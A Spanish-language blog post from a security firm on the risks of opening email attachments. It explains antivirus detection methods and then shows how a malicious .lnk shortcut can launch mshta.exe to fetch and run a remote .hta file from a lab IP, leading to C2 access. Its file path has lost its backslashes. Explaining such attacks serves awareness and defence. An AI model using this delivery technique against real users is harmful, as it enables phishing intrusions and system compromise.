Los peligros de abrir archivos adjuntos de correo - Perspectiva de un hacker
Desde nuestra experiencia como hackers, te contamos más sobre el peligro de abrir archivos adjuntos de correo para tu ciberseguridad.
En Tozetta luchamos contra la ciberdelincuencia. Nuestros hackers trabajan continuamente para poner de manifiesto las vulnerabilidades en software y sistemas. Las vulnerabilidades que encontramos pueden, en muchos casos, prevenirse. Por eso hemos decidido escribir semanalmente una "Actualización de vulnerabilidades". Suscríbete a esta actualización y recibe cada semana más información sobre la forma de trabajar de un ciberdelincuente. En este blog: ¿cuál es el peligro de abrir archivos adjuntos de correo electrónico?
1. Pueden faltar medidas de seguridad
Aunque mucha gente confía en su software antivirus, es importante ser consciente de que esta protección no es infalible. Los hackers han encontrado formas de eludir el software de seguridad codificando malware avanzado que pasa desapercibido. Cuando se abre un archivo adjunto malicioso, este malware puede instalarse sin ser detectado, dando al hacker acceso al sistema.
El software antivirus ha evolucionado considerablemente a lo largo de los años y desempeña un papel crucial en la protección contra el malware. Estas son algunas de las principales formas en que los programas antivirus detectan malware:
Detección por firmas
El método más común es la detección basada en firmas. Los programas antivirus utilizan bases de datos con firmas conocidas de malware, como hashes MD5 o SHA-1, o secuencias de bytes únicas. Si un archivo coincide con una firma conocida, se marca como malicioso. Imagina que tienes una estantería llena de libros y quieres asegurarte de que ninguno de ellos sea peligroso o dañino. Tienes una lista con los títulos de los libros peligrosos que ya conoces. Cuando recibes un libro nuevo, compruebas rápidamente si su título está en tu lista. Si es así, sabes al instante que el libro es peligroso y hay que retirarlo o colocarlo en un lugar especial para que no pueda causar ningún daño.
Los programas antivirus hacen algo parecido, pero con archivos informáticos. Tienen una lista de características (como un código único o una "huella digital") de programas maliciosos (malware) que ya conocen. Cuando llega un archivo nuevo a tu ordenador, el programa antivirus comprueba si ese archivo está en la lista. Si el archivo coincide con algo de la lista, el programa sabe que es peligroso y se asegura de que no pueda causar ningún daño.
La gran ventaja de esto es que funciona muy rápido y es eficaz contra amenazas conocidas. Pero si aparece un nuevo tipo de archivo malicioso que aún no está en la lista, puede pasar desapercibido con este método.
Análisis heurístico
Además de las firmas, algunos programas antivirus utilizan el análisis heurístico para detectar malware desconocido. Esto implica simular la ejecución de un archivo en un entorno aislado (sandbox) para identificar comportamientos sospechosos. Aunque es un proceso complejo y que consume mucho tiempo, puede detectar malware nuevo y desconocido antes de que realmente abras el archivo en tu propio ordenador.
Análisis de comportamiento
El software antivirus también puede aplicar análisis de comportamiento, en el que se monitoriza el comportamiento de un programa durante su ejecución. Si el comportamiento coincide con el de malware conocido, el programa puede bloquearse o ponerse en cuarentena. Así se evita que el malware siga propagándose.
Detección basada en la nube
Algunos programas antivirus modernos utilizan computación en la nube e inteligencia artificial para mejorar la velocidad y precisión de la detección. Sin embargo, este enfoque es costoso y todavía no está tan extendido como la detección por firmas o heurística.
Existen innumerables formas de hacer llegar malware a una víctima. Una de ellas (algo anticuada, pero que todavía funciona) es adjuntar un archivo .lnk (acceso directo) en un correo, con una carga maliciosa dentro.

C:WindowsSystem32mshta.exe http://192.168.0.195/demo.hta
Para hacerlo más convincente, podemos cambiar el icono.
Esto se puede añadir como archivo adjunto, y en cuanto se abre, vemos que se visita nuestro enlace .hta.

¿Qué contiene un archivo .hta de este tipo?
En el archivo .hta puede aparecer algo como lo siguiente. Este ejemplo simplemente abre un cmd.exe, pero también puede utilizarse, por ejemplo, para obtener un archivo, guardarlo en disco y luego ejecutarlo. Además, también puede usarse para, por ejemplo, descargar scripts de PowerShell y ejecutarlos por completo en memoria. Por motivos de demostración, no hemos incluido el archivo .hta malicioso real. A continuación se muestra un ejemplo básico, para que puedas hacerte una idea aproximada de lo que contiene.
En el ejemplo, hemos modificado el archivo .hta para que obtenga nuestro malware y se conecte con nuestro servidor C2. En un servidor C2 de este tipo, los actores maliciosos pueden ver de forma clara qué hosts han comprometido y pueden seguir moviéndose por la red, robar información o, por ejemplo, ejecutar ransomware si tienen privilegios de administrador o de administrador de dominio.

¡Mantente al día sobre los ciberriesgos!
Cada semana, nuestros hackers comparten sus conocimientos y experiencia. Al suscribirte a la Actualización de vulnerabilidades, recibirás semanalmente un consejo de un hacker ético sobre vulnerabilidades en software y sistemas. Al entender cómo ven los atacantes a tu organización, esperamos ayudarte más en el mundo de la ciberseguridad. ¿Quieres leer este tipo de blogs cada semana? ¡Suscríbete más abajo!
Pero si quieres saber más sobre cómo poner de manifiesto de forma estructural las vulnerabilidades en software y sistemas, lee más sobre nuestra solución Hacking as a Service. Además del pentesting regular, también ofrecemos una herramienta de monitorización de seguridad que escanea a diario vuestras aplicaciones web y/o red interna en busca de estos numerosos CVE.
O lee más sobre Hacking as a Service >>